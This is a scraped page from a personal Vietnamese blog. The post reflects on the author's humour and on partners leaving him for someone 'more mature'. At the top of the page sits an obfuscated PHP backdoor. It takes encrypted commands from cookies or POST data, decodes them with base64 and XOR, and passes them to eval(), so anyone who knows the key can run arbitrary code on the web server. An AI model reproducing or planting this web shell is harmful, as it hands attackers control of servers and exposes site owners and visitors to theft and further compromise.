$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> The Unforgiven – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

The Unforgiven

Anh lấy tên một trong những bài metal kinh điển làm title cho bài viết này, chỉ bởi vì trong bài hát có một câu

What I’ve felt, What I’ve known, Never shined through in what I’ve shown

Các bạn có thể nghe bài hát này ở đây Metallica – The Unforgiven

Anh ngồi uống rượu với vài người bạn. Cả buổi đấy, anh chỉ khựng lại bởi đúng một câu nói, nội dung thì tương tự như câu anh đã quote ở trên.

Anh có những tài lẻ, những ưu điểm để theo đuổi một ai đó dễ dàng. Nhưng mà, trớ trêu thay, những người anh thật sự thương yêu lại rời xa anh, vì không phải những, mà chỉ một điều anh cho là ưu điểm nhất của anh.

Bạn không cần phải biết anh trong dăm mười năm. Bạn cũng không cần phải là tâm giao của anh, hay gặp mặt anh. Bạn chỉ cần ngồi nói chuyện với anh 5′, là bạn có thể cảm nhận (cái này không phải anh tự nhận, nhiều người đã nói), là anh có óc hài hước rất cao.

Anh luôn cười. Khi anh không cười, thì anh hay chọc người khác cười.

Những người con gái mà anh thật sự yêu, ban đầu đều ấn tượng với anh bởi cái-mà-họ-gọi-là tính như trẻ con của anh.

Họ cảm thấy thoải mái khi chat, khi fone, hay khi ngồi nghe anh kể chuyện.

Nhưng chính họ, lại rời xa anh vì lí do đấy.

Các tình yêu của anh (trong quá khứ và cả hiện tại), đã bao giờ các bạn nghĩ rằng nếu anh không vì muốn thấy nụ cười trên môi các bạn, thì anh đóng vai “trẻ con” làm gì?

Các tình yêu của anh (trong quá khứ và cả hiện tại), khi các bạn rời xa anh để chọn một người “chín chắn” hơn anh, các bạn biết anh làm gì không? Bề ngoài anh vẫn chỉ cười, vẫn nói những câu nói đùa, như anh đã làm. Ngoài điều đó ra, anh còn biết làm gì đây?

Làm sao anh trách được các bạn, khi trước đến giờ, người ta vẫn đánh giá một người thông qua cách hành xử bên ngoài.

Những gì anh đã thật sự trải qua, các bạn không thể nào đánh giá hết được đâu. Các bạn cũng sẽ không bao giờ biết được lí do, cả trong mối quan hệ bạn bè, lẫn tình yêu, anh đều chọn như-anh-hiện-tại đâu!

Thế nhé.

B.l.u.e

p/s: nếu bây giờ các bạn gặp anh, anh vẫn đang cười 🙂.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.